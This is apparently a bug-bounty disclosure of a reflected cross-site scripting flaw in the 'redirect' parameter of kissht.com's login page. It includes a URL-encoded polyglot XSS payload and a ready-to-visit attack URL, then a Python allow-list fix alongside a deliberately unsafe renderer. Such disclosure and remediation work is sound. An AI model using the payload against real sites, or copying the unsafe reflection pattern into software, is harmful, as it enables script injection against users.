Bug on Kissht

Vulnerability Name: Cross Site Scripting (on the mobile OTP entry page)

Vulnerable URL: https://kissht.com/login?redirect=%22%2f%3ejaVasCript%3a%2f%2a-%2f%2a%60%2f%2a%5c%60%2f%2a%27%2f%2a%22%2f%2a%2a%2f(%2f%2a%20%2a%2foNcliCk%3dprompt()%20)%2f%2f%0D%0A%0d%0a%2f%2f%3c%2fstYle%2f%3c%2ftitLe%2f%3c%2fteXtarEa%2f%3c%2fscRipt%2f--!%3e%5cx3csVg%2f%3csVg%2foNloAd%3dprompt(123)%2f%2f%3e%5cx3e

Vulnerable Parameter: redirect

Vulnerable Payload: %22%2f%3ejaVasCript%3a%2f%2a-%2f%2a%60%2f%2a%5c%60%2f%2a'%2f%2a%22%2f%2a%2a%2f(%2f%2a%20%2a%2foNcliCk%3dprompt()%20)%2f%2f%0D%0A%0d%0a%2f%2f%3c%2fstYle%2f%3c%2ftitLe%2f%3c%2fteXtarEa%2f%3c%2fscRipt%2f--!%3e%5cx3csVg%2f%3csVg%2foNloAd%3dprompt(123)%2f%2f%3e%5cx3e

How to reproduce this issue:

1. Visit the URL; it will give an XSS popup.
   https://kissht.com/login?redirect=%22%2f%3ejaVasCript%3a%2f%2a-%2f%2a%60%2f%2a%5c%60%2f%2a%27%2f%2a%22%2f%2a%2a%2f(%2f%2a%20%2a%2foNcliCk%3dprompt()%20)%2f%2f%0D%0A%0d%0a%2f%2f%3c%2fstYle%2f%3c%2ftitLe%2f%3c%2fteXtarEa%2f%3c%2fscRipt%2f--!%3e%5cx3csVg%2f%3csVg%2foNloAd%3dprompt(123)%2f%2f%3e%5cx3e

POC: Screenshot can be found in the attachment.
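The fix the report points at is server-side: treat `redirect` as a same-origin path (allow-list, not blacklist) and attribute-encode it on output. The following is an added example in Python, not code from the report or from kissht.com; the hidden-input rendering pattern is an assumption, since the report does not show how the parameter is reflected, and the only input it exercises is the payload quoted above.

```python
import html
from urllib.parse import unquote, urlsplit

# The polyglot from the report above, exactly as submitted (URL-encoded).
REPORTED_PAYLOAD = (
    "%22%2f%3ejaVasCript%3a%2f%2a-%2f%2a%60%2f%2a%5c%60%2f%2a'%2f%2a%22%2f%2a%2a"
    "%2f(%2f%2a%20%2a%2foNcliCk%3dprompt()%20)%2f%2f%0D%0A%0d%0a%2f%2f%3c%2fstYle"
    "%2f%3c%2ftitLe%2f%3c%2fteXtarEa%2f%3c%2fscRipt%2f--!%3e%5cx3csVg%2f%3csVg"
    "%2foNloAd%3dprompt(123)%2f%2f%3e%5cx3e"
)

# Characters that have no business in a post-login path: line breaks (header
# injection), NUL, and HTML/JS delimiters.
FORBIDDEN = set("\r\n\t\x00<>\"'`")


def safe_redirect_target(raw, default="/"):
    """Allow-list a ?redirect= value: a single same-origin, root-relative path.

    Anything else (absolute URLs, scheme-relative //host, backslash tricks,
    markup) collapses to `default` instead of being reflected.
    """
    if not raw:
        return default
    value = unquote(raw)
    # Must be root-relative, and not "//host" or "/\host" (browsers treat both
    # as a new origin).
    if not value.startswith("/") or value[1:2] in ("/", "\\"):
        return default
    parts = urlsplit(value)
    if parts.scheme or parts.netloc:
        return default
    if any(ch in FORBIDDEN for ch in value):
        return default
    return value


def render_redirect_field(raw):
    """Hardened rendering: validated value, then attribute-encoded on output."""
    target = safe_redirect_target(raw)
    return '<input type="hidden" name="redirect" value="%s">' % html.escape(target, quote=True)


def render_redirect_field_unsafe(raw):
    """Assumed vulnerable pattern (not taken from kissht.com): the decoded
    parameter is dropped straight into the attribute, so a value that closes
    the quote and the tag brings its own markup with it."""
    return '<input type="hidden" name="redirect" value="%s">' % unquote(raw)
```

Running the report's payload through both renderers shows the difference: the unsafe one emits the injected `<sVg` tag, the hardened one emits `value="/"`.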



Domain: https://kissht.com/

Reported on kissht.com

Total # of issues reported = 3

Reported by mrhacker14012001

Total Points of mrhacker14012001 = 13

Browser Version: 60.0

Operating System: Linux

OS Version:

Bug Type: Security
Status: open
Added on: May 16, 2019, 2:54 a.m.

